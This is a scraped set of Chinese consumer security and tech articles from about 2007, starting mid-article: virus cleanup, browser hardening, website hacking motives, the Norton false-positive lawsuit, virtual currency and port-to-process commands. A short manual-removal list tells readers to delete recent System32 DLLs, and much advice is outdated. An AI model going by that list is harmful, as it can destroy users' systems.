　　就算卫士的武功再高，如果你的城墙破破烂烂，也无法阻挡敌人的入侵。我们要做的就是每月定时修补已经发现的破损城墙。即进行Windows Update ，通过Windows Update我们可以获得最新的安全漏洞的修复补丁。



图三 Windows Update

　　最新、最流行的病毒、木马、蠕虫等通常都利用了操作系统的最新的漏洞来达到传播感染的目的，就像入侵者利用城墙的破损处进入城里。所以及时的修复安全漏洞是每个月必须要做的措施。

　　如果你想操作系统一安装完就含有最新的补丁，请参考《打造含最新补丁的xp安装光盘》。

　　打系统安全补丁的第二种方法是使用360安全卫士、瑞星漏洞扫描器、超级兔子升级天使等的安全软件来打全系统补丁。

其它防范措施 加强浏览器的安全防护

　　1 使用第三方浏览器

　　比如开启世界之窗的安全浏览功能，如果浏览网页的时候，某网页要运行程序，它都会给出警告，而这些程序往往就是病毒木马。



图四 世界之窗浏览器拦截浏览器自动运行的程序

　　比如使用FIREFOX浏览器点击下载firefox。因为很多网页病毒都是针对IE浏览器的, FIREFOX不采用IE内核,从而避免的感染的风险。

　　2 使用瑞星卡卡助手等ie防护软件

　　如果你不喜欢用第三方浏览器，那么安装ie防护软件是个不错的选择。

　　比如安装并开启了瑞星卡卡助手的防漏墙之后，遇到浏览器要执行某个程序，卡卡助手也会发出警告并提示你是否允许运行。



图五 卡卡助手拦截浏览器自动运行的程序

　　3 关闭浏览器的Activex和java功能

　　是个因噎废食的方法 推荐在没有任何安全防护的情况下才使用，有以上措施的不需要再使用此方法。此方法将导致一些网页无法正常浏览。

　　关闭方法：控制面板→网络和internet连接→internet选项 →安全→自定义级别→禁用 Activex和java。



图六 禁用浏览器的Activex和java功能

不怕病毒猖獗 教你清除和防范网页病毒

天极yesky

作者： 宋宇玲(原创)

　　如今网上病毒、木马十分猖獗，冲浪时稍不留意就会中毒，接下来你的IE会不断弹出广告页面、上网速度奇慢，类似的问题，上网的朋友几乎都遇到过。也许你会调出杀毒软件去杀病毒，但是通常都清除不掉，因为这些病毒一般都能躲避杀毒软件的查杀。如何清除和防范网页病毒呢?这是广大网友都想解决的问题，也是本文探讨的话题。

一、网页病毒的工作原理

　　所谓网页病毒，就是网页中含有病毒脚本文件或JAVA小程序，当你打开网页时，这些恶意程序就会自动下载到你的硬盘中，修改注册表、嵌入系统进程;当系统重启后，病毒体又会自我更名、复制、再伪装，进行各种破坏活动。

　　二、 如何清除网页病毒?

　　为了免杀，网页病毒一般都经过了压壳处理，所以常用的杀毒软件是无法识别它们的，因而也无法清除之!如果你想清除网页病毒，只有使用以下方法：

　　1、 利用KV2007的未知病毒清除功能

　　对于未知病毒，国产杀毒软件基本上都无能为力，不过江民杀毒软件的未知病毒处理能力走在了行业前列，KV2007查杀未知病毒能力就很强大，使用KV2007的未知病毒清除功能即可清除网页病毒。



图1 未知病毒检测

　　启动KV2007，打开主界面的“工具”/未知病毒检测/检测未知病毒，软件就会自动扫描未知病毒(图1);稍等片刻，发现的可疑文件就全列出来了。如果你要显示所有的扫描结果，请选中[显示全部];默认情况下，软件只会显示可疑概率在10%以上的文件;如果某文件可疑概率在25%以上，基本上属于病毒，请右击该文件，选择“删除文件”进行删除;对确定不了的可疑文件，建议点击“上报样本”把它传给江民公司，由厂商确认它是否为新病毒。

　　提示：平时应打开KV2007的木马/注册表监控，即使感染了未知病毒，使用“未知病毒检测”和“江民木马一扫光”也能自己清除之。

　　2、 使用金山毒霸2007的可疑文件扫描

　　金山毒霸2007的“可疑文件扫描”功能，也能查出电脑中的可疑病毒文件。



图2 可疑文件扫描

　　在金山毒霸 2007 主界面，点击菜单“工具”/可疑文件扫描(图2)，就会调出“可疑文件扫描工具”，点击“开始扫描”，将扫描可疑病毒文件;完成后会显示发现的可疑文件及其位置信息(下图3)。如果确认是病毒，就从列表中查出其路径位置，然后进入该文件所在目录手工删除;如果不能确定是病毒，则点“立即上报”将可疑文件传到金山公司，由他们来鉴别是否为病毒。

金山毒霸2007虽然也能检查未知病毒，但其查毒能力不如KV2007强大。目前查/杀未知病毒最强的是国外的杀毒软件kaspersky，国产软件中只有KV2007使用了kaspersky技术，而其他国产杀毒软件，查/杀未知病毒能力就很弱了，所以对付网页病毒，首推使用KV2007!

　　另外，在使用杀毒软件时，应将其设置为“开机自动启动”、“自动更新”，以便软件能每天自动更新。常用杀毒软件网址如下：

　　江民：http://www.jiangmin.com/

　　金山：http://www.kingsoft.net/

　　瑞星：http://www.rising.com.cn/

　　诺顿：http://www.symantec.com/region/cn/index.html

　　趋势科技：http://www.trendmicro.com/cn/home/enterprise.htm

　　3、利用搜索引擎鉴别未知病毒

　　当你运行KV2007查出可疑文件后，搜索引擎也能鉴别未知病毒。建议你到http://link.labxw.com以可疑文件或进程作为关键词进行搜索，在搜索结果中即可得知这是不是病毒，如何清除?

　　三、网页病毒的防范技巧

　　为了防范网页病毒，你应该采取以下措施：

　　1、升级并设置浏览器

　　很多恶意网页只对IE5.0及以下版本有效，因此只要你及时升级IE，即可提升系统的安全性。另外，提高浏览器设置中的安全级别，将ActiveX及Java全部禁止掉，也能有效防范恶意网页，方法如下：

　　打开IE，点击菜单“工具”/Internet选项/安全，选择“Internet”，点击下面的“自定义级别”，在“安全设置”对话框中，设置IE为中级安全设置，选择默认设置级别为“安全级-中”；



图3 安全设置

　　然后在此基础上进行更严格的设置，禁止ActiveX插件和控件以及与Java相关的组件，对于Java程序，一般建议禁止，即在Java设置部分，点击“禁用”(图3)。你可以尝试着每次只更改一两个项目，如果导致无法上网，则恢复启用相关设置，多试几次直到找到适合自己的最佳安全设置组合。

　　最后打开“我的电脑”，依次点击“工具”/文件夹选项/文件类型，在文件类型中，删除所有针对脚本文件扩展名为“VBS、VBE、JS、JSE、WSH、WSF”的操作，这样此类文件即被禁止执行，达到了防范网页病毒目的。

　　2、使用专门软件进行防范

　　有些软件(例如白猫清理工、超级兔子、优化大师等)具备禁止网页病毒功能，只要你安装启动这类软件，即使登陆恶意网站也不会中毒!

　　白猫清理工V3.04能彻底禁止网页病毒运行，不过该软件需要花钱注册才能使用的，安装后即可免费使用!



图4 白猫清理工

白猫清理工运行后，请点击“安全设置”，在弹出的窗口中点“安全漏洞”;然后勾选“选择Windows传统风格的文件夹，消除本地HTML安全隐患”，再点“禁止网页病毒”(下图4)，软件就会自动扫描系统中是否有漏洞，如果发现漏洞，则会提供对应补丁的下载地址，建议你下载安装补丁、冲浪前打开白猫清理工，就不怕网页病毒啦!



图5 禁止网页病毒

　　超级兔子7.96也能防范网页病毒。运行超级兔子上网精灵，点击“安全设置”，在右边的窗口中(下图5)，把“禁止恶意网页攻击IE”、“修补IE漏洞”、“检测系统安全状况”、和“禁止远程修改注册表”都打勾，这样你上网冲浪时就不会感染网页病毒了!

　　3、开启杀毒软件的病毒防火墙

　　病毒防火墙能查杀、隔离恶意网页，现在的杀毒软件例如KV2007、金山毒霸等，都有病毒防火墙功能。因此浏览网页时，请务必开启杀毒软件的“网页监控”和“允许系统监控”功能，以便防范网页病毒。

　　四、防范病毒的一些忠告

　　为了防范病毒，请你及时更新操作系统、及时给系统打补丁;安装杀毒软件，打开实时监控、及时更新病毒库。另外，以下场合要特别警惕：

　　1、下载时要注意防毒

　　下载软件请尽量到华军、天空等著名的网站去，不要到一些BBS或者个人网站去下载，以免下载了带毒文件，展开后你就会中毒!

　　不要轻易运行未知的可执行文件，以免中毒。双击“我的电脑”，点击菜单“工具”/文件夹选项/查看，勾选“显示所有文件和文件夹”，不勾选“隐藏已知文件类型的扩展名”，以便能看到所有文件及扩展名。

　　2、防止从邮件中毒

　　设置电子邮件工具，以免病毒通过Email传播。如果你使用Outlook 2003收发邮件，请点击“工具”/选项/邮件格式，选择“纯文本”格式发送电子邮件，这样能防止邮件被植入恶意HTML代码;如果你收到不明邮件，也不要点击其中的链接，以免中毒!

手工干掉一般的病毒！

1.请进入安全模式,反安装可疑程序(插件等)删除:\WINDOWS\TEMP\

2. 删除C:\Documents and Settings\******\Local Settings\Temp\下的所有文件

3.删除 C:\Documents and Settings\*******\Cookies\下的所有文件

4.删除 c:\winnt\*.tmp\下的所有文件,

5. 删除:C:\WINDOWS\SYSTEM32\最新的dll文件（注意确定自己是否最近有安装软件，有就要谨慎删除，以免误删）

6.C:\Documents and Settings\**********\Local Settings\Temporary Internet Files\

下的通通干掉。

搞定！OK！

说明： “ ******* ” 为用户文件夹名。

以上办法比较适应，特拿出来共享！

谁来告诉我为什么我的网站会被黑客攻击

谁来告诉我为什么我的网站会被黑客攻击

作者：杨山河　来源：赛迪网安全社区

【编者按：网站遭遇黑客的攻击，这在当今社会几乎是很常见的事情了，可为什么会这样，你是否知道呢？】

站被黑是必然

每至假期节日，都是黑客事件频发之时。眼下时至年关，黑客攻击事件又将层出不穷，各企事业单位也加紧信息安全防范，同时针对黑客攻击行为的新闻也随之而出。

1、2006年4月20日中国银联疑遭黑客攻击导致系统突发故障，北京、上海、杭州等大城市纷纷出现无法跨行取款、POS机无法消费等情况；据专家预计此次攻击与银联实施某项收费项目有关，事实上此收费项目的确也是遭到多数人不满意的情况强制实施。

2、2006年9月11日早上，中国移动通信集团公司网站hxxp://www.chinamobile.com被一位署名为“935fa12ec828a3f3”的黑客篡改了该网站的首页，并涂鸦：“恳请移动话费能便宜点不……”，同时被黑的还有中国移动旗下品牌动感地带网站（hxxp://www.m-zone.com.cn）。

3、2006年9月12日百度公司被黑客采用一种被称为同步泛滥技术（syn flooding）的持续攻击，即通过大量的虚假IP地址建立不完整连接，使得服务超载，从而使百度不能提供正常的服务。而此时正因为百度负面事件不断之时，如百度的商业广告客户因商业纠纷准备起诉百度，甚至有人联系到声称制造此次事端的黑客，该黑客表示：“不喜欢百度，尤其是最近裁员、与天极及搜狐的口水战等事件中，百度的处理方式让他非常不满，于是决定黑百度。”该资深黑客强调，“黑百度只是这名‘黑客’的个人行为。”

4、2006年11月6日河南人事厅网站被黑客攻击，同月10日，司法局网站同样遭遇噩运。据曾对郑州市各政府网站担任第三方评估的河南某网络公司副总经理表示，目前整个郑州市和省直机关的政府网站硬件设施应该是全国一流的。至于被“黑”，原因可能是多方面的。

而据专家解释：“服务意识不强，网站用来充门面，这几乎是政府网站的通病，服务意识决定责任意识，服务意识不强，责任意识自然也不会好到哪里去，被‘黑’也是情理之中。”

实际上还有更多的案例，那些个人网站，租用虚拟主机的网站更是没办法列举。鉴于互联网的普及，以及各类黑客攻击技术的发展，无论是商业网站乃至国际知名巨头网站，还是无名小站，只要是对外提供访问服务，就必然面临遭受攻击的危险，从专业安人士的角度来看，你的网站被黑是必然，不被黑才是偶然。

网站被黑的原因

那些原因，是促使您遭受黑客攻击呢？这其中当然有很大一部分是属于经济原因，但并非所有攻击都是因为经济缘故。大体来讲，导致黑客攻击的原因有：

1.受雇于他人的黑客行为，如商业竞争对手恶意竞争通过黑客手法攻击；如据互联安全网报道： 黑客受雇恶意文档攻击西方企业 ，这类攻击就属于商业竞争行为。

2. 受商业利益驱使，敲诈勒索、盗取各类银行帐户信息及虚拟财产的黑客攻击行为；如各类钓鱼行为都属于商业利益驱使的攻击行为。

3.恶作剧型的黑客行为，如随意篡改网站首页；这类黑客攻击往往是一些新手的尝试行为，更多的是为了一种虚荣心的满足。

4.搜集肉鸡，攻击一个网站后，挂上网页木马（可导致浏览该网站者中毒而使自己的计算机成为入侵者的肉鸡）；这类是为其他类攻击原因作准备，据从互联安全网社区获得的案例，有黑客竟然通过这类行为掌握了数万台的肉鸡。

5.打击报复型，如网站服务不好而引起的商业纠纷等无法处理的时候会有黑客攻击行为；如前一段时间某威客网站经常遭受莫名攻击导致无法正常提供服务，有权威人士就指出乃是因为其网站客户服务不到位，无故刁难客户导致黑客人士不平进而遭受DDOS攻击，根本不是所谓其自己据称的遭受竞争对手恶意攻击。

6.窃取资料型，此类攻击主要针对一些资料网站包括收费用户网站，一般攻击者不会破坏服务器及网站数据，但会悄悄将数据偷走据为已有；如盗取网站管理员的密码之类。

7.菜鸟测试型，这类一般为一些正在学习黑客技术的人通过攻击网站练习的人骇客新手，这类攻击一般攻击经验少，容易对网站数据造成破坏；

8.其他原因。

如何避免你的网站被黑

1、首先要重视网站安全建设，从安全制度、安全硬件、安全人员配备等都要有一定的规划。如果网站的拥有者都不重视网站安全，仅把网站安全当作一个技术问题，那就是会带来严重的麻烦。

2、要做好数据备份，防止不幸后可以将受攻击的损失降到最低。

3、进行安全检查，主动进行渗透检测，最好考虑联系专业的第三方安全服务机构进行独立和专业的渗透检测，避免内部力量的不足和非独立性。这类安全方面的专业机构，各有特色，例如北京的绿盟科技、深圳的安络科技、广州的互联安全网等等，都是由一批原为“黑客”的技术人员创办的网络安全公司，专职于信息安全技术领域的研究及解决。

4、定制安全服务，因为安全服务不是一次检测等就可确保安枕无忧的，需要定期进行安全维护，以及安全服务机构提供一些安全日常服务。

5、多主动掌握安全资讯，上国内互联安全类网站去，赛迪、天极等专业媒体有专门的安全频道和专题专栏。

了解客户端上网流程　发现网站是否挂马

作者：李铁军　来源：赛迪网

用户的访问过程包含以下环节：

1.客户端通过ISP访问互联网，ISP指网通、电信的ADSL或长宽、歌华、铁通等互联网接入服务商；

2.客户访问某站点的镜像服务器获取资料；

3.部分站点没有配置镜像服务器，用户直接访问源服务器。

攻击点：

1.在客户端（网民）主机或网络中发送攻击代码，比如ARP攻击，插入恶意代码，诱使用户访问攻击者指定的站点，这时会影响该客户端或其所在的网络；

2.ISP服务商的网络，比如部分无良服务商强制插入广告。或者ISP服务商被攻击，用户访问了攻击者设定的内容。

解决办法：

用户到服务器之间的链路挂马，只能由用户端或ISP们解决。这种类型的挂马，表现为某用户或某地用户访问特定网站时发现挂马，而其它地区的客户未发现挂马。

源服务器和镜像服务器之间的链路：

1.服务器内容提供者管理源服务器的内容；

2.源服务器和镜像服务器按某种机制同步内容；

3.在用户访问镜像服务器上没有的内容时，镜像服务器从源服务器同步。

攻击点：

1.源服务器被入侵，攻击者直接修改了源内容。这样，通过镜像同步后，所有客户端访问该站点都会发现挂马。通常这种现象被称“服务器被黑了”

2.镜像服务器或服务器所在机房的网络中某台主机被入侵，攻击者通过会话劫持把被修改的内容提供给用户。这个情况较常见，比如机房中总能找到容易被入侵的主机，攻击者在这台主机上安装攻击程序，然后利用ARP攻击手段影响整个机房局域网。

3.在源和镜像同步的链路中间下手，劫持篡改了从源到镜像的数据，镜像得到的是被篡改后的源内容。

解决方案：

1.加固源服务器，恢复被篡改的内容；

2.查找机房的攻击源，隔离攻击源，机房各主机之间绑定MAC和IP地址，防止ARP攻击得手；

3.源服务器和镜像服务器之间采用加密通信，比如VPN，这样会消耗较多带宽，降低性能。

最安全的作法：

也最极端，从客户端到源服务器之间的通信全部加密，这样安全性会得到保证，但影响了用户体验。典型例子是网络银行客户端，全程加密所有数据。对普通网民来讲，本地安装的反病毒软件是保护电脑安全的最后一道防线，请及时升级，呼吁使用正版。



通常用户访问某个Web站点的过程

熊猫烧香作者进班房 诺顿误杀却要免责

熊猫烧香作者进班房 诺顿误杀却要免责

新闻来源:王如晨@cnetnews

大街上的警察叔叔，如果自身素质不高，对小偷或强盗这种角色的判别容易失误，那他就会变相沦为让无辜者蒙冤的工具。被异化的善，同样可以成为恶。赛门铁克似乎无意间就成了这样的警察。由于它的诺顿软件对于用户PC文件的“误杀”，导致中国百万台PC运行异常，利益遭受损害。这家公司“淡淡”地说， 这是公司在病毒定义代码方面的错误改动所致，对于给用户造成的“不便”，深表歉意。起初它未提赔偿字眼，昨天，它又发出声明称，先修复用户电脑，赔偿的事 随后说。危害确实已是事实。那个搞出熊猫烧香的武汉小青年已经进了班房。赛门铁克虽然不是病毒制造者，但是作为犯错的警察，也总该要做点什么吧。

　　笔者认为更需要思考的是，如果网络安全厂商自身不安全，那自诩的信息安全卫士的价值，不就成了一种悖论？

　　赛门铁克强调了它作为全球第一大信息安全企业的影响力。但公众有理由将其归因于技术实力不足、本土化力度不够等原因。而在竞争激烈、甚至扭曲的商业环境下，它的行为随时可能成为远比病毒更甚的威胁。

　　举例来说，谁也难保这次它的“无意改动”中是否隐含了商业竞争意图。它“误杀”的是微软操作系统的文件，这是否可以解读为它对后者的反抗，以展示微软操作系统的安全漏洞？因为，由于后者正倾向于在操作系统中捆绑更多安全功能，可能涉嫌垄断，而赛门铁克之类的企业正不断群起抗争。

　　在国家竞争与意识形态丛生的社会中，更会引发另一重焦虑，即安全企业是否会充当所属国家利益的开拓者？如果它们通过网络作祟，那安全的外衣更容易蒙蔽潜在的市场。毕竟，多年以来，某些跨国企业的种种不良，让越来越多的公众对它们自称的“好公民”角色充满了不信任。

　　这似乎有些上纲上线，扯得有些远。但是，无论背后意图如何，即使拿单纯的技术层面看，不小心之后的补救措施无非是对受损的PC进行修复。这是一种滞后的商业行动。

　　那么，我们仍要问，到底该由谁来定义“安全”与“不安全”？“赛门铁克们”当然不能独揽。人们对上次海啸造成的海底光缆传输中断表示了理解，那是天灾。但当全球面临“赛门铁克们”的人为安全威胁时，那到底由谁来实施监督之监督的职责呢？

　　至少目前，除了事后的商业补救条款，以及相关法律等工具外，还没有办法实施监督之监督，防卫之防卫。人们已经习惯了在这种悖论的“保护”下进行网络生存。

用户不满"以后考虑赔偿" 赛门铁克已经被告上法院

诺顿“误杀”事件爆发后,赛门铁克公司称将赔偿列为“以后考虑”的问题.记者上午获悉,因遭“误杀”导致电脑内大量文件及数据丢失,诺顿用户刘先生已于昨天下午向海淀法院递交诉状,提起首例赔偿案.

据悉,海淀法院已收下诉讼材料,但须审查后决定是否立案.

因受到此次“误杀”事件的波及，刘先生笔记本电脑内的文件全部丢失。“现在电脑里到挺干净，啥都没了。”刘先生告诉记者，他正在给一个公司代理电缆方面的 招投标，而投标书以及跟招投标有关的数据都在那台电脑里，现如今这些重要文件全没了。不但如此，他受几个亲戚朋友的委托帮忙炒股，可由于电脑故障，耽误了 星期一开盘。“那一天我至少损失了10万。”刘先生在诉状中，向赛门铁克(北京)公司索赔交通费、误工费、财产损失费等共计5万元。

刘先生的代理人、万腾律师事务所张华利律师告诉记者，电脑文件以及因电脑故障造成的间接损失很难折算成具体的赔偿额，而且举证方面也存在困难，因此他们此次只提出5万元的保守索赔。

据了解，从5月18日开始，“诺顿”在升级病毒库时，误把Win-dowsXP的几个关键系统文件当成病毒删除，国内大量诺顿杀毒软件用户集体发生电脑系统瘫痪。

专家建议

能获赔多少主要看举证

今天上午，北京大学法学院教授佟强对此案分析后表示，法院在能认定赛门铁克公司承担责任的前提下，确实将面临用户的损失如何计算的问题。

一方面，用户很难对电脑中已经丢失的文件或资料进行举证；另一方面，有一些特殊文件，比如照片，可能本身不具有很强的财产价值，但是对个人而言，却具有重 要的意义。这些直接损失就已很难计算，更何况因此产生的间接损失。而目前对此尚无相关的法律规定，能获赔多少主要在举证上。

用“限额赔偿”定统一标准

佟教授表示，这与航空公司托运行李的情况有些类似，受害者一样无法举证已经丢失的行李中都有些什么物品，该如何计算这些物品的价值？但是“限额赔偿”的相关规定却解决了这一问题。

佟教授建议，诺顿“误杀”这件事后，立法上应该进一步完善，可以比照航空公司的赔偿思路，制定一个统一的赔偿标准。

《北京晚报》消息

诺顿一个Bug要赔垮一个公司,别的公司呢?

诺顿的赔偿事宜没有结果,一旦赔偿,数额一定很可观.而想蒙混过关,却是前途未卜,难上加难. 诺顿是一个安全软件,这次的“误杀门”或可称为软件的一个BUG,然而正是这样一个BUG,让诺顿光环跌落,未来凶险莫测.

对于软件的BUG我很疑惑，BUG无一例外都会影响用户的使用，可大可小，还得看谁用。软件通常都是采取修补、恢复的方法解决，赔偿的先例很少。 没有一个软件没有BUG。

使用正版Windows出现了BUG我们是否应当索赔呢？

使用正版游戏出现了BUG我们是否应当索赔呢？

使用付费的工具出现了BUG我们是否应当索赔呢？

....

推而广之到硬件，使用显示器出现问题是否应当索赔呢？

使用硬盘出现问题是否应当索赔呢？....

软硬件生产商是否该购买保险来减少BUG出现带来的损失呢？

虚拟物品交易催生网上乱象 成产供销一条龙市场

虚拟物品交易催生网上乱象 成产供销一条龙市场

作者：张烨 罗娟 |

　　“小表妹这可是推给我一个大累赘啊！天天都得花钱在那么虚幻的东西上！”武汉大学的小余苦笑着说。小余所说的“大累赘”是小表妹之前所养的一只QQ宠物，由于小表妹临近高考，家人断了网线，养QQ宠物就落到了小余的肩膀上。“每天得给它买饭、掏学费、看病，动不动还吵着要吃冰淇淋，我们吃一个好点的冰淇淋才1.5元，但QQ宠物吃的就要1.8元,除了这些它还要买车，还要请其他要好的QQ宠物吃饭，我的银子就这么白白流走了！”

　　像小余表妹这样在网上养养宠物早已不是什么新鲜事了，比如网易推出的“梦幻西游”，玩家还可以领养孩子，不管你年龄多大，现实生活中有没有孩子，都可以在网上过一把当父母的瘾。

　　无论是养宠物还是养孩子，花费都是少不了的。于是，网上各种各样虚拟的付费方式越来越为人所熟知，Q币、大话币、魔兽币、天堂币、网易POPO币、盛大点券等都成了时尚青年的财富。

　　网络消费：我就是喜欢

　　“总的已经花了8000多元了吧，我现在每月的生活费是500元，大概有250元到300元都花到了‘劲舞团’上。”兰州资源环境职业技术学院的小赵告诉记者。

　　他说，“劲舞团”挺烧钱的，买衣服、做发型什么的都得花钱，其中一个使用率最高的发型是30元，但没办法，他就是喜欢。

　　与小赵同班的小魏就不一样了，每月500元的生活费有一大部分都花在了网络游戏上，没钱了不是向同学借，就是在网吧赊账。

　　笔者在某论坛上看到一个“玩网络游戏花了多少钱”的讨论，其中花了一两万元的不在少数，甚至有一名网友说他的朋友花了40万元，不管是真是假，网络游戏消费对于这些没有经济来源的学生或刚刚走上工作岗位的上班族来说，确实是一笔相当大的花费。

　　买点卡、兑换游戏币是玩家们在网络游戏中的花费的主要方式。这些虚拟货币究竟算不算一种货币？游戏币在游戏过程中究竟扮演了一个什么角色？游戏商和玩家各有各的看法。

　　虚拟货币惹是非

　　今年2月，文化部、工商总局等14部委联合印发《关于进一步加强网吧及网络游戏管理工作的通知》，通知中指出，“虚拟货币已出现对经济金融秩序产生冲击的趋势”，并下令“严禁倒卖虚拟货币”，那么，网络游戏中的游戏币真的足以对现实中的经济秩序产生冲击吗？

　　“它需要用人民币购买，就如同儿童游戏中心的代币一样，本身是商品，并非任何类型的货币。”腾讯公司的工作人员冯小姐告诉笔者。

　　Q币是一种最普及的虚拟货币，可以养宠物、买QQ秀、布置QQ空间等，甚至在选秀比赛中都可以用Q币来投票。

　　虽然腾讯公司一再强调Q币只是商品、在用户之间不能互相转移，但这一说法却被众玩家的实际行动颠覆：今年3月27日，浙江省丽水市人民法院作出一审判决，两名Q币大盗分别以盗窃罪的罪名被判13年和10年，他们通过虚设手机号码来充Q币值，然后再以3折的价钱转卖给玩家。这是我国首例涉及偷盗虚拟财产被重判的案件。

　　“为这些虚拟的东西犯罪真不值得，但是最后这些东西又能兑换成钱确实还是挺诱人的。”有网友这样表示。

　　实际的虚拟网络交易已经超出了人们预料的范围，围绕着虚拟物品的交易，产生了在游戏中以获取虚拟物品为工作的职业玩家、炒作游戏点卡和虚拟物品的炒家等等，实际上已经成了产、供、销一条龙的网上交易市场。

　　“我们玩的网络游戏是‘大话西游’，通常是通过游戏里面的保镖、跑环、倒卖装备等途径来获得大话币，一般100元人民币可以兑换3000万左右的大话币。”专门从事“打币”工作的老唐觉得打币对于玩家来说是合理的。

　　网易公司的李经理认为，既然打币和代练这一类的现象存在，市场上又有需求，就肯定有其存在的合理性。“比如上班族很少有时间去玩游戏，但又不想在游戏中落后于别人，就可以找代练者或者打币者来得到好的武器及装备。”

　　张鹏(化名)在网上认识的一些资深玩家，他经常拿现金买一些高级武器、装备。“在附近的，会亲自见面，一手交钱一手交账号，距离比较远的，会将钱打到他的银行账号上。但这样的交易安全性就没有办法保证了。有一次我就吃了这样的亏，花了很多钱却没见到武器。”

　　专家：心理引导作用大于立法

　　许多网友在玩网络游戏的过程中，武器丢了，但从来没有向管理员报过案，“这只是一个游戏而已”。但很多玩家在网络游戏中丢了东西后，向管理员报案甚至告上法院，却没有得到满意的结果。

　　“我认为网络游戏不需要立法，因为它是虚拟的而不是实体的。”网易公司的李经理说，我们更应该引导玩家不要过分看重虚拟的武器装备，因为它对游戏商来说只是一个数据，是保存在公司的服务器里的，厂商如果停止运营游戏的话，这些道具、武器也就自然不存在了。

　　“网友私下进行虚拟货币和虚拟物品的交易会带来很多社会问题，如网络盗窃、网络诈骗等。”腾讯公司的冯小姐介绍，去年腾讯、盛大、网易等5大游戏厂商就曾联合发出声明，呼吁国家对于虚拟财产立法、禁止第三方交易平台对于虚拟物品的非法交易。

　　“对于现有的网络上的消费和交易活动，现行法律已经足够了。”大成律师事务所高级合伙人吕良彪告诉笔者，法律并不是万能的。虚拟空间给人充分发挥想象力的机会，能带来虚幻的成功和快感。但它同时使人放下面具，自控能力减弱。他建议，在我国目前的条件下，心理引导的作用要远远大于立法。

网管必读:寻找系统端口与进程间的关联

网管必读:寻找系统端口与进程间的关联

作者：bitao　来源：赛迪网技术社区

如果发现一些从没见过的端口号，你怎样分辨出该端口是不是木马开放的端口?或者在进程列表中发现陌生的进程时，是否想知道该进程在你的系统中开了什么端口?

一、根据进程查端口号

首先在开始菜单的“运行”框中输入“cmd.exe”进入命令提示符窗口，先键入“tasklist”命令将列出系统正在运行的进程列表，把你要查的进程所对应的“PID”号记下或复制。

小资料：单击右键菜单中的标记，然后将你要查的进程对应的“PID”号选中，按一下“回车”键就可以了。需要注意的是，相同的进程图像名每次运行的“PID”号一般都不会相同，所以一旦该进程重启后，该“PID”号就会改变，这就需要重新查看。

把进程的PID号记下后，接下来就用这个PID号把该进程所开的端口显示出来了。

在当前的命令符下继续键入“netstat -ano | findstr 1140”命令，其中“netstat -ano”参数表示以数字形式显示所有活动的TCP连接以及计算机正在侦听的TCP、UDP端口并且显示对应的进程IDPID号；“|findstr 1140”表示查找进程PID为“1140”的TCP连接以及TCP、UDP端口的侦听情况（在实际应用中，需要把你刚才记下或复制的PID号替换掉这里的1140）。按“回车”键后，就会显示出该进程所开的端口号。

我们可以明显地看出，PID为“1140”的进程所开启的端口为“3001”，如果此时没有任何提示信息返回，则说明该进程没有开启任何端口。

二、根据端口号查进程

在命令提示符窗口中输入“netstat -ano”命令，列出系统当前的端口列表，该命令的作用已在上面提过了。-o参数的作用主要是显示各端口对应的进程PID号，现在把你要查的端口对应的进程PID号记下或复制。然后在命令提示符下继续输入“tasklist /fi ″PID eq 788 ″”（在实际应用中，需要把你复制或记下的PID号替换掉这里的788），这行语句“/fi”参数表示在“tasklist”中筛选，而“PID eq 788”则是指定筛选的条件，按“回车”键后，就会显示出端口对应的进程。

可以看出，PID号为“788”所对应的进程为“svchost.exe”，如果你查的端口没有关联任何进程的话，此时就会返回“没有运行带有指定标准的任务”的提示信息。

三、查出进程对应的程序

知道了端口和进程的关联后，如何再进一步查出该进程是那个软件或程序的进程呢?

下面的操作就需要用到Windows 2000（Server或Professional版都可以）安装光盘中的一个工具。

首先在安装光盘的“SupportTools”目录下，用解压软件打开“support.cab”压缩包，找到“tlist.exe”文件，将此文件释放到任一目录，如“D：Support”。然后在命令提示符窗口中切换到此目录，运行“tlist.exe”命令，把要查的进程对应的PID号记下或复制（第一列就是进程的PID号），然后继续输入“tlist.exe 2012”命令（你输入的时候，需要将刚才记下的PID号替换掉这里的2012），“CmdLine”后面显示的就是该进程对应的软件所在的目录。

除此之外，返回信息中还列出了该进程所调用的文件，得到了这些信息就可以很容易查出进程对应的程序了。

假如想关闭某个进程，可把该进程的PID号记下，在命令提符下输入“taskkill /pid 2400”2400是PID号）就可以将PID号为2400的进程关闭，如果要强制关闭该进程，只须在这条命令的后面加个“/f”参数即可。

快速发现 Windows 系统监听或开放端口

网络安全之TCP端口作用、漏洞及操作

史上最强?从0到33600 逻辑端口详解

总结各个网络端口的入侵

端口·木马·安全·扫描应用知识概览

端口知识面面观！通透了解电脑安全之门

黑客软件最常用的连接端口一览

小心!黑客软件最常用的连接端口曝光

高手必读 网络端口安全防护技巧放送

全面认识你的网络端口

谁阻碍了政府信息公开

《计算机世界》深度报道:谁阻碍了政府信息公开

4月24日国务院公布的《中华人民共和国政府信息公开条例》(以下简称《信息公开条例》),将在明年5月1日正式实施.依照条例规定,政府网站是信息公开最主要的渠道之一.

然而,我国政府网站建设水平参差不齐.某些地方政府的门户网站,“信息公开”只是一块“遮羞布”;绝大多数内容转自新闻媒体,有用信息严重滞后.

事实上,10年来,各部委和地方政府也制定了相关的政府信息公开条例.现状和目标为何呈现出如此巨大的落差?是什么阻碍了政府信息公开的脚步呢?

信息离公开还有多远

政府网站是这几年来各级政府机关一直比较关心的信息化建设工程,也是政府发布信息、老百姓获取政府信息的重要渠道.

然而,记者随机进入近20多家政府网站中却发现,各个政府网站的建设呈现出巨大落差,尤其在政府信息公开方面,简直是“冰火两重天”.

有些部委网站,譬如商务部、文化部网站,不仅内容丰富、访问量大,而且政府信息公开做得相当不错——公开了政府信息公开目录,各个处室的业务一目了然.而有的网站,有失其政府门户的“身份”,网站或栏目的建设从成立之初就处于“建设中”的状态,半年不变,形成了门户网站的“烂尾工程”.

“部分政府网站是为了完成政府信息化建设任务,应对上级测评而建的'面子'工程.”某网络建设人士对记者表示,“根本看不出它们是政府网站,信息披露对老百姓毫无指导意义.”

早在3年前,涉及政府信息公开的“民告官”案件就已浮出水面.2004年5月,上海一位69岁的董老太向徐汇区房屋土地资源管理局申请,要求查阅她的房屋产权相关原始材料时遭到拒绝.为此,董老太以政府信息不公开为由,将徐汇区房屋土地管理局告上了法庭.

当年的5月,恰是《上海市政府信息公开规定》正式施行之时.而整个案件庭审中双方主要针对两个焦点辩论:原告董老太是否享有该房产原始资料查阅权,以及此案是否适用于上海当年实施的信息公开规定.

